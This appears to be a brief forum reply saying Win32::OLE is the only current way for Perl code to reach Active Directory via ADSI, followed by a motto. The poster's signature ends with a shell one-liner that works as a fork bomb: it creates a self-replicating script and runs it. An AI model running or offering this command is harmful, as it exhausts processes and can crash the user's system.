in reply to Does Win32::OLE suck?
Win32::OLE is the only way to write perl code that interfaces with Active Directory (see: ADSI) at the moment.
You should keep this wise saying in mind:
There is no glory in the easy victory.
ibanix
$ echo '$0 & $0 &' > foo; chmod a+x foo; foo;